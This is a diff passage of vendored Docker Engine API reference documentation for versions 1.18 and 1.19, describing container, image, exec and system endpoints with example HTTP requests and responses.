+**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.18/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.18/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. 
+- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. 
+ +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.18/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.18/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.18/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. 
+ Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Example request**: + + POST /v1.18/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.18/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275 + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135 + } + ] + +**Example request, with digest information**: + + GET /v1.18/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 
2429728 + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.18/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. 
+ +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the Dockerfile. This is + ignored if `remote` is specified and points to an individual filename. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. 
+- **X-Registry-Config** – base64-encoded ConfigFile object + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.18/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. +- **repo** – Repository name. +- **tag** – Tag. If empty when pulling an image, this causes all tags + for the given image to be pulled. 
+ +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.18/images/ubuntu/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Created": "2013-03-23T22:24:18.818426-07:00", + "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0", + "ContainerConfig": { + "Hostname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": true, + "OpenStdin": true, + "StdinOnce": false, + "Env": null, + "Cmd": ["/bin/bash"], + "Dns": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": null, + "VolumesFrom": "", + "WorkingDir": "" + }, + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Parent": "27cf784147099545", + "Size": 6824592 + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.18/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "b750fe79269d", + "Created": 1364102658, + "CreatedBy": "/bin/bash" + }, + { + "Id": "27cf78414709", + "Created": 1364068391, + "CreatedBy": "" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.18/images/test/push HTTP/1.1 + +**Example response**: 
+ + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +**Example request**: + + POST /v1.18/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object. + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.18/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.18/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server 
error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.18/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "star_count": 12, + "is_official": false, + "name": "wma55/u1210sshd", + "is_automated": false, + "description": "" + }, + { + "star_count": 10, + "is_official": false, + "name": "jdswinbank/sshd", + "is_automated": false, + "description": "" + }, + { + "star_count": 18, + "is_official": false, + "name": "vgauthier/sshd", + "is_automated": false, + "description": "" + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.18/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.18/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Containers": 11, + "Debug": 0, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": 1, + "Images": 16, + 
"IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": 1, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OperatingSystem": "Boot2Docker", + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "SwapLimit": 0, + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.18/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.5.0", + "Os": "linux", + "KernelVersion": "3.18.5-tinycore64", + "GoVersion": "go1.4.1", + "GitCommit": "a8a31ef", + "Arch": "amd64", + "ApiVersion": "1.18" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.18/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.18/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "PortSpecs": null, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + 
"date" + ], + "Volumes": { + "/tmp": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + create, destroy, die, exec_create, exec_start, export, kill, oom, pause, restart, start, stop, unpause + +Docker images report the following events: + + untag, delete + +**Example request**: + + GET /v1.18/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966} + {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970} + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. 
Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.18/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.18/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. 
+See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.18/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "Tty": true + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. 
+ + +**Status codes**: + +- **201** – no error +- **404** – no such container + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.18/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.18/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. 
+ +**Example request**: + + GET /v1.18/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: plain/text + + { + "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39", + "Running" : false, + "ExitCode" : 2, + "ProcessConfig" : { + "privileged" : false, + "user" : "", + "tty" : false, + "entrypoint" : "sh", + "arguments" : [ + "-c", + "exit 2" + ] + }, + "OpenStdin" : false, + "OpenStderr" : false, + "OpenStdout" : false, + "Container" : { + "State" : { + "Running" : true, + "Paused" : false, + "Restarting" : false, + "OOMKilled" : false, + "Pid" : 3650, + "ExitCode" : 0, + "Error" : "", + "StartedAt" : "2014-11-17T22:26:03.717657531Z", + "FinishedAt" : "0001-01-01T00:00:00Z" + }, + "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c", + "Created" : "2014-11-17T22:26:03.626304998Z", + "Path" : "date", + "Args" : [], + "Config" : { + "Hostname" : "8f177a186b97", + "Domainname" : "", + "User" : "", + "AttachStdin" : false, + "AttachStdout" : false, + "AttachStderr" : false, + "PortSpecs": null, + "ExposedPorts" : null, + "Tty" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ], + "Cmd" : [ + "date" + ], + "Image" : "ubuntu", + "Volumes" : null, + "WorkingDir" : "", + "Entrypoint" : null, + "NetworkDisabled" : false, + "MacAddress" : "", + "OnBuild" : null, + "SecurityOpt" : null + }, + "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5", + "NetworkSettings" : { + "IPAddress" : "172.17.0.2", + "IPPrefixLen" : 16, + "MacAddress" : "02:42:ac:11:00:02", + "Gateway" : "172.17.42.1", + "Bridge" : "docker0", + "PortMapping" : null, + "Ports" : {} + }, + "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf", + "HostnamePath" : 
"/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname", + "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Name" : "/test", + "Driver" : "aufs", + "ExecDriver" : "native-0.2", + "MountLabel" : "", + "ProcessLabel" : "", + "AppArmorProfile" : "", + "RestartCount" : 0, + "Volumes" : {}, + "VolumesRW" : {} + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + +This might change in the future. + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. 
Setting `*` (asterisk) allows all origins; +the default (blank) value means CORS is disabled + + $ docker -d -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.19.md b/vendor/github.com/docker/docker/docs/api/v1.19.md new file mode 100644 index 0000000000..a1a7280d3a --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.19.md @@ -0,0 +1,2238 @@ +--- +title: "Engine API v1.19" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.19/ +- /reference/api/docker_remote_api_v1.19/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + - When the client API version is newer than the daemon's, these calls return an HTTP + `400 Bad Request` error message. + +## 2. 
Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.19/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0 + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded 